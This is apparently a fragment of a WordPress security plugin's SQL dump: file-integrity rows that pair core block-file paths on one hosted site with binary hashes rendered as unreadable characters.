('òï6UÞ*)u1@)\0Póè', 'wp-includes/blocks/navigation-link/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation-link/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'šdÑ(Äû³S–zòÙB®', 'üá´/2#ç²§P^ê*G¤­Û‹ª˜kŽwá£F¿l', '', 0, '?'),
('kã§Ë‡À„‹^mæ\\‡–”', 'wp-includes/blocks/navigation-link/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation-link/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'æJ’g•UsÖúÝñ6¢í', 'ZT áÎðª''’ýýÆí´VcL¶»uåª˜+‰’c¥X', '', 0, '?'),
('…–õ€w.(	µ=çºÚé', 'wp-includes/blocks/navigation-link/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation-link/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Gaî÷²JQçìyób†', ')þÍ®9vÑWlXô¤°ªcÓi3ÊÇ™CÜÜa®8¶/‹', '', 0, '?'),
('ùV	ëµWžky‚	³', 'wp-includes/blocks/navigation-link.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation-link.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ABÓµÁ¸Èkõ?J¥Ä', '/,UeÛK&7¥a B@ü¢§>@VAºòGÇ˜†¡', '', 0, '?'),
('x†7.D&ôÚ¹ïgæ¹', 'wp-includes/blocks/navigation-submenu/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation-submenu/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'b"Ô±ÍÄa¤»í(Ä', '%¼¯]cÄŒ	­“&©$_°_©ê1;SŒÂß·¶"', '', 0, '?'),
('çìQŠåŠÍoêCPÞ¶ãš', 'wp-includes/blocks/navigation-submenu/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation-submenu/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'FåÇ)—CåçÈ;]<‡™', 'ÑÔ«\0PT‚rQ>ËJ"T‹þ™£ñ{W½JÎC(Ú', '', 0, '?'),
('Ä8»d$çnx‰¥™yÅš', 'wp-includes/blocks/navigation-submenu/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation-submenu/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þ#¡r\r÷l³ø\0³{@/‚°', '¯SèuñÁ´/{RÈÄÀ\\‚ÉðeÒ²-xãFßÚh!EÚ', '', 0, '?'),
('f£¦mÈ„©%¦#!y\rÀ', 'wp-includes/blocks/navigation-submenu/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation-submenu/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eFs)ªã,™¢3àå+À›', 'qP,ï$B°{r¾^_z#@çÛb›+VG¡j\n)Ð`', '', 0, '?'),
('PL•ŸF^Ñ9Rá6z³p', 'wp-includes/blocks/navigation-submenu/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation-submenu/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶…fŸHï2X»m.ÞÇW', '¢\Z(f)ÈgWóNVÇyþ!øqÜ¹zg°°%¡Æ', '', 0, '?'),
('qj¤æO.C¸Þ¬Ð˜}íùÇ', 'wp-includes/blocks/navigation-submenu.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation-submenu.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'P_µVß¹ì·+5®àF', 'W¿ÐzaÃ´}ÚmPJÌ¨Ë‚ug@5Ö\n$AÙ', '', 0, '?'),
('VWñ;zôæ*°Ãã(ØºŒ', 'wp-includes/blocks/navigation.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/navigation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fZn®Á”7ø-„Êt', 'KhŸ°±¸á¶œ²(D1q\\äR>\nëØÊ¯oÇÐ', '', 0, '?'),
('Ós}ÔùÇ¶ê)ÓTÐV¯Ï', 'wp-includes/blocks/nextpage/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/nextpage/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ío¹ÆÇX‡Víá‹Mµ‡¯', '2÷?õú#Ò{•eOz‰é_Q²”„ú"ÄzÔ}', '', 0, '?'),
('	t]¤9¹Ù''«ñÿ‹Ñ', 'wp-includes/blocks/nextpage/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/nextpage/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ei¿@¥ÍFËFèÁÁ\ZŽ', 'ø-!`¿,#Ã¡œþ¼láŸ³DýTDÒ	Ùvý8=Yª5F', '', 0, '?'),
('ÓðHÙÌAGÿ|³™¤"­', 'wp-includes/blocks/nextpage/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/nextpage/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6Rc›±0µt F¼æö0', 'ìãX§kW¦¦ŸœŸ4çêxÕY‰ÔÄ˜ÑHš7óšy¡a', '', 0, '?'),
('°ë¹ñ‘XµøÆ-ŒOf', 'wp-includes/blocks/nextpage/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/nextpage/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ei¿@¥ÍFËFèÁÁ\ZŽ', 'ø-!`¿,#Ã¡œþ¼láŸ³DýTDÒ	Ùvý8=Yª5F', '', 0, '?'),
('öW#:æáV¸ó¦šü^H3X', 'wp-includes/blocks/nextpage/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/nextpage/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6Rc›±0µt F¼æö0', 'ìãX§kW¦¦ŸœŸ4çêxÕY‰ÔÄ˜ÑHš7óšy¡a', '', 0, '?'),
('Q¯x˜¾Ì¿Py€ºá''uE|', 'wp-includes/blocks/page-list/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ïˆzˆ-†ÞÝ’Ý|ˆ3€‚½', '„ƒ-x´Ã‘¢&ï>Û&ˆr\0ÅIB\rœ‡\n™–™ûï/È', '', 0, '?'),
('þ/e\n•¬o†?}m‰bK', 'wp-includes/blocks/page-list/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÜPb7rFÎ”mÀ§«T', 'aoá0CŒHÿ¢º¾*B¶p§5íh\Z\r¾ãj\rG', '', 0, '?'),
('<|q„|xÜ²\\èízZ´{', 'wp-includes/blocks/page-list/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—†ã(MìBŒì‡_çîš', 'º¡ºÔl[­)îÙ%=g\Z\ZöãœF¸€ðtºW', '', 0, '?'),
('ŒÈã¯}/ÍpSÛÃÇ', 'wp-includes/blocks/page-list/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÜPb7rFÎ”mÀ§«T', 'aoá0CŒHÿ¢º¾*B¶p§5íh\Z\r¾ãj\rG', '', 0, '?'),
('³tõ~¼µ½ÊÞÈ*ìÖ†', 'wp-includes/blocks/page-list/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—†ã(MìBŒì‡_çîš', 'º¡ºÔl[­)îÙ%=g\Z\ZöãœF¸€ðtºW', '', 0, '?'),
(')''hLíœž¿\rÐ€^‡¿¹', 'wp-includes/blocks/page-list/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ý8Ë	±xñÆ ŽÆvR<ƒÅ', 'IˆI³|{8ºÊ°Áõ$æN³i÷Õ0<&[¿vÙHVß^', '', 0, '?'),
('•\\Ð”ƒÞhÝƒc˜', 'wp-includes/blocks/page-list/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¦˜EnÇt<³¾4\0§eJÚ', '¹Ð4ìˆÓù…²7ŸoþÆÀšD²¢74:ÚJ[', '', 0, '?'),
('P£€høýãüŸ~é·â›PÎ', 'wp-includes/blocks/page-list/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ý8Ë	±xñÆ ŽÆvR<ƒÅ', 'IˆI³|{8ºÊ°Áõ$æN³i÷Õ0<&[¿vÙHVß^', '', 0, '?'),
('DQ#‘u÷»nU\\ @¹<Æ', 'wp-includes/blocks/page-list/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¦˜EnÇt<³¾4\0§eJÚ', '¹Ð4ìˆÓù…²7ŸoþÆÀšD²¢74:ÚJ[', '', 0, '?'),
('\0°XöªLŽ&¤†¬¢\Zòf', 'wp-includes/blocks/page-list-item/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list-item/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÿ--ÂªZ(’Î¡£RC', '³œ?çñ5¢ãà °)''¹\\ÇúDMh_¹æ‘š‹É', '', 0, '?'),
('œµwp¦mîŽTÑÃc', 'wp-includes/blocks/page-list-item.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list-item.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Õmº×0òe§jñ¿ûo`îi', '-DJ»‘—@o\ZfAgâ„''N8Oë\Zž`æÇ(µ™â', '', 0, '?'),
(')è­¦ÎûQžóQ¯/Y´9', 'wp-includes/blocks/page-list.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/page-list.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '34©©Ju„ùá¿\0', 'zÈjˆÎ¤£|¬ó\Z	ÀáVhÁ¸%9£zé	Ú‘’·', '', 0, '?'),
('Þâ\\§ê‹h\ZÂÈ)Ä ‰', 'wp-includes/blocks/paragraph/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/paragraph/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í¢–d‰÷\nI64!´Û×"', 'Ñù[K]UÈŽˆv¨ÅhZ·	éÈ\0Ö®lo™0¦z¹…', '', 0, '?'),
('o¬	Ç»ÿ	&ãïc÷ÞÚ', 'wp-includes/blocks/paragraph/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/paragraph/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"a''	b+µ0Ô™Â«¶ìžO', '©¯ÅÍÁ(w ½“mÂ¤ÅbÁ\Z:‘—ƒ7í=§1Íè', '', 0, '?'),
('?¼ÆïÏ¶‹^7:y¸Ñ', 'wp-includes/blocks/paragraph/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/paragraph/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÒRƒHúüÿ©ÎñÝÇÂ‚	;', 'Áìi7j‹–;ÇW€;)Àè„.ETõPŒÒÓt8¿', '', 0, '?'),
('Þ Æq«Ç¡ÈDÄ„äb,', 'wp-includes/blocks/paragraph/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/paragraph/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"a''	b+µ0Ô™Â«¶ìžO', '©¯ÅÍÁ(w ½“mÂ¤ÅbÁ\Z:‘—ƒ7í=§1Íè', '', 0, '?'),
('ïjU Ç3ê0<ÌgéÝb', 'wp-includes/blocks/paragraph/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/paragraph/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÒRƒHúüÿ©ÎñÝÇÂ‚	;', 'Áìi7j‹–;ÇW€;)Àè„.ETõPŒÒÓt8¿', '', 0, '?'),
('}´Î-¥$˜L¢H_R”š™', 'wp-includes/blocks/paragraph/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/paragraph/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‚®ôvzñ/\rç{ˆ;®³', 'ëÆ¦ï­[r°GkËÄbñJa/ä!ªíJz8', '', 0, '?'),
('+ô¦(-V&S_2X7f ', 'wp-includes/blocks/paragraph/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/paragraph/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ':Ï:™ópó´ïÑ7I', '\Z7Ë–˜r3e04x<O?…¬ÕÒ™7Øì$\r‡û„2', '', 0, '?'),
('c%¼;8ÛQVWÆdÈ‡õ:', 'wp-includes/blocks/paragraph/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/paragraph/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'XˆVÑÊ˜ÍgBÚÎþ_', '¯îê(k"\r8›IÆø#ÜOfŒÊVKŠˆûê¸ö', '', 0, '?'),
('2ˆ»Ð!C|è²R4µØ¶¶J', 'wp-includes/blocks/paragraph/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/paragraph/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'öÄ,CcÃ.ççaÐ`Ð»>', 'ÞØ+ê‡]þÈÆù|Ìä1Ï£@ËO-Ñ÷$›°', '', 0, '?'),
('O2É‚Hï€Þæ!Ö’ñœ[=', 'wp-includes/blocks/pattern/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pattern/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2[ÉhY—èÇû±¾»', '½øäÙú¤äS´Ó49éJ§æ<Ö¤¢…oÖ,ŸŒB', '', 0, '?'),
('&Ðö°õº°ÕÍ‚|d8î', 'wp-includes/blocks/pattern.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pattern.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ûu‚Yº´-ªšiP®ÆM', 'ºÿô0R\\¥p­¯¾z™1zh0ã/U-ÈäA+', '', 0, '?'),
('°cƒ1ˆ;†È!Šoe', 'wp-includes/blocks/post-author/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-author/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'RÛÅ³Î°ÛgæˆÖ÷Ê', 'æÜ‡ùÆi)Á‚‹0N´èÇ+[!µ¼Õƒì¯`ãÓ', '', 0, '?'),
('¼YJ’ìOÏÎ ð*ZÒ€å', 'wp-includes/blocks/post-author/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-author/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¨¬õâºè3UM}Zg²šµ', 'ÒQÝª·IÞ¯kîNQÔZŸ¢sˆ²Z³)JYÒY', '', 0, '?'),
('(–TÓk|«k›sT‹û', 'wp-includes/blocks/post-author/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-author/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­SMöƒüý»r7à''8.o', 'Ô8@•ûÜóeÉû€ˆnë†Rl‚ûçVJ¨”çŠ‹B', '', 0, '?'),
('.k;¡ªÍÈÃw†§q', 'wp-includes/blocks/post-author/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-author/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Øl‹J8•6¦•ì4‹ûá', '¢^¼ÿ/5Z0%“àþ¬ýË¹B\0×SæõÓšCâIf<', '', 0, '?'),
('ÇSQêsY7aFÇIMjŠz', 'wp-includes/blocks/post-author/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-author/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7Û–Ž|)î×+©Îj¼.', 'æëp÷+zEŽ''ˆžvú³¯~Ä9Î`òW|Õj!ºð', '', 0, '?'),
('PìZy7‹qX¶I9®Ã', 'wp-includes/blocks/post-author-biography/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-author-biography/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'M?¬·©úaªõ	ay”ÇÎw', 'ØÞÆÇ²‚qp:\rÊ¡kV&‹FH+ ­Æ°½sÃ	…p', '', 0, '?'),
('?hæh™:zÍqZi¹V', 'wp-includes/blocks/post-author-biography.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-author-biography.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ï]0Ú™ÖZ''fàŒ', 'Óm¡·vE;úÃôútæ!±ËXRµ.C˜EcR…‰Jên', '', 0, '?'),
(' ŒWâíÆ,@{Ê™?9', 'wp-includes/blocks/post-author-name/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-author-name/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '…¥Zj^F±s‰×úój”', ',\nù€BÊÏ§¿Ú›bîo”4è</= F?Š€w', '', 0, '?'),
('6ùÝ4oo7Ï!¹á6„õ', 'wp-includes/blocks/post-author-name.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-author-name.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ø½j#TÇiPo„PµŽCã', 'l*³¿¬ÛÝÆûËTàCêÚßõùÑáÿæÆ8¶"¸^', '', 0, '?'),
('ÿAú£a‡KÔoùƒô¯+O', 'wp-includes/blocks/post-author.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-author.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„/ }_G[˜Å‰þäŸn', 'EMÚ€lô¢-	@HÏb­Náu¡ÞIë‡<\nËþ', '', 0, '?'),
('ù—±éÆÙü:êv\0¶éÖŒs', 'wp-includes/blocks/post-comments-form/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-comments-form/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\n ÙI¬ÈØÔÑšgZ\\', 'WÂü‘Ë''âÖíß¥ˆ·0Hµ/N|ÑÏ+oVŽf‚»', '', 0, '?'),
('GQóÆ{)?RÃ`†ŸÞ)²', 'wp-includes/blocks/post-comments-form/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-comments-form/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1{â±„ñké«_¨ßBv(²', 'kÆèó¤œð-\n !²5Á<˜s„+ÆLTy3“wšý', '', 0, '?'),
('Õ•L»¡+7>$É¡4æ¨]', 'wp-includes/blocks/post-comments-form/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-comments-form/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ì®›’ó9\n.ha¿‹=8ä¶', '«¤¶bŒð›Š?C¯=PýË\næ¦EÎHÍg÷pE', '', 0, '?'),
('»üTÍp0Ã]oµb†±Ë[', 'wp-includes/blocks/post-comments-form/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-comments-form/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1{â±„ñké«_¨ßBv(²', 'kÆèó¤œð-\n !²5Á<˜s„+ÆLTy3“wšý', '', 0, '?'),
('H|¿°Øë±''çY¹f', 'wp-includes/blocks/post-comments-form/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-comments-form/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ì®›’ó9\n.ha¿‹=8ä¶', '«¤¶bŒð›Š?C¯=PýË\næ¦EÎHÍg÷pE', '', 0, '?'),
('¶ùÆh›ÒÞ	¤iˆ8.', 'wp-includes/blocks/post-comments-form/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-comments-form/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'º‘ÐÐšNŠÂÐ{Œ\r½€©', 'EFJÙý9xB)\nÊøì`!†yöÊ|â2cbF', '', 0, '?'),
('uàGóF\\:ø»©)¼˜Î', 'wp-includes/blocks/post-comments-form/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-comments-form/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '|O1\\AælFý…†<\Z†', 'êu°ËN\ZØÀÝnÛØâM’u¡‰Ç ÕÄ.’š\Z.UiÛ+', '', 0, '?'),
('2f~¨ÿë¼vöîXà3èL', 'wp-includes/blocks/post-comments-form/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-comments-form/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'o\nùõvÄ%Tß±{ÑÒ¥÷', 'î»øRl!Þ0mº\\´þ”ŒÐ²5Ð¶·B·!\r]Œ~l', '', 0, '?'),
('\Za©¤''üºM;€×È­Ul', 'wp-includes/blocks/post-comments-form/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-comments-form/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ws¯¥ò…À\nÖ•÷Â', '“µøÕ¤fÌé”#§~#n2¸ÌÉôJ8V¢à›"À', '', 0, '?'),
('¶{ïr›p7åê¼Î>]à³', 'wp-includes/blocks/post-comments-form.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-comments-form.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÌnäÝˆúÅ,aCHfÇ·', 'ÉƒÚrøÅ²tE\r.:G-Që8W˜ž6Ô	G¾=%fd', '', 0, '?'),
('Ù±ºµMPrËÑh~Œžù', 'wp-includes/blocks/post-content/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-content/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Vj›~™r(K~&2Jºs', 'ïŽ’œDž¨¸2ýš–Àk‹ž¢dgX›ê|‰¨(‹ÈC™Å', '', 0, '?'),
('Ž)ä„ØþXö,m©jéçT', 'wp-includes/blocks/post-content/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-content/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ëJ±)¼ô…ejˆë¸', '×ÓŠ”<wžÉc‰%dU‚.’Þ^qs°FkÿyÎ', '', 0, '?'),
('VEÞ8¼k–b÷g&:,', 'wp-includes/blocks/post-content/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-content/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'DÚö\rLÜ&±ÆÔ^T¬L', '?w@Q×¶’Ü”wTÒ\Zë0”ù6\n¹>”=¦h', '', 0, '?'),
('}:î°š\\ù°.?BÕÎB', 'wp-includes/blocks/post-content/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-content/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ëJ±)¼ô…ejˆë¸', '×ÓŠ”<wžÉc‰%dU‚.’Þ^qs°FkÿyÎ', '', 0, '?'),
('H-¹F!|úJõ+)u', 'wp-includes/blocks/post-content/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-content/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'DÚö\rLÜ&±ÆÔ^T¬L', '?w@Q×¶’Ü”wTÒ\Zë0”ù6\n¹>”=¦h', '', 0, '?'),
('–5ýÃ;Tÿõ]¸ß\0ÃÂ”', 'wp-includes/blocks/post-content.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-content.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶ª³©üïPSVzä@ŸÔk', 'ÀÌŽ¶»ÀŒTŒSd³€­«? 9"«‡‹k¢N\0''Ñ', '', 0, '?'),
('Pæh›ui8V§£\0kU±', 'wp-includes/blocks/post-date/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-date/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ë†óÉt\07öôTÍè', '‘ÔQ‹·6íÓ\0¡tÓ°eÑ«Ø‰ëÕmé€ª|€iºZ0 ', '', 0, '?'),
('Ã§²½`¼¢í \n³ßBÁ', 'wp-includes/blocks/post-date/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-date/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Â=íãñÁaºV…‚•ì¬', 'œÑC`¶ÿbH&2*6Ô¹(]3ÐÚýÍ\\ˆ‹nÚ¶}é', '', 0, '?'),
('d4c\r/-÷\n•€Ý>Èí', 'wp-includes/blocks/post-date/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-date/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3–†úâÙ¦>éLã''', 'Òü¬°ß?´Öa°h–‚»™Æ–ovñ¬Ö×5nh', '', 0, '?'),
('­áÛÞ;\nû7ºÚ“4t>J', 'wp-includes/blocks/post-date/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-date/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Â=íãñÁaºV…‚•ì¬', 'œÑC`¶ÿbH&2*6Ô¹(]3ÐÚýÍ\\ˆ‹nÚ¶}é', '', 0, '?'),
('ŒwB~~ð¦üú¥BPƒ8', 'wp-includes/blocks/post-date/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-date/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3–†úâÙ¦>éLã''', 'Òü¬°ß?´Öa°h–‚»™Æ–ovñ¬Ö×5nh', '', 0, '?'),
('CKë©J¼Á6LAMÌkV', 'wp-includes/blocks/post-date.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-date.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=’¢^â”³/Y½‘PØ', 'ð<¥ófLE«Úö¹yÑ _|+		÷rºXà¸T|k­', '', 0, '?'),
('ú4/ÖáÙ»~±é<+®', 'wp-includes/blocks/post-excerpt/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-excerpt/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'DéÊt ]’¤t^už', '\ZXw´ø–¦[tD’ÅB­ƒK`4´=!W6Àˆ¯yùÎK‹', '', 0, '?'),
('9*I§±œCc“ºŸô', 'wp-includes/blocks/post-excerpt/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-excerpt/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¦9ÁÿÕa¹Nð4=’™\r^', 'É~üÅªA¬á‘WäÈw¡@7Švzšà¼öÍä£4ï_', '', 0, '?'),
('#”\\M´Ã@­0¬ÚT´', 'wp-includes/blocks/post-excerpt/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-excerpt/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©	“<ë•Ð\r''w9zR', 'OšFsoKL*Õ(\nÖbâ`†fNXƒsSÔš†\\S¡]', '', 0, '?'),
('\0\\sèÁTÃ«½Ö˜8áÃ', 'wp-includes/blocks/post-excerpt/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-excerpt/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¦9ÁÿÕa¹Nð4=’™\r^', 'É~üÅªA¬á‘WäÈw¡@7Švzšà¼öÍä£4ï_', '', 0, '?'),
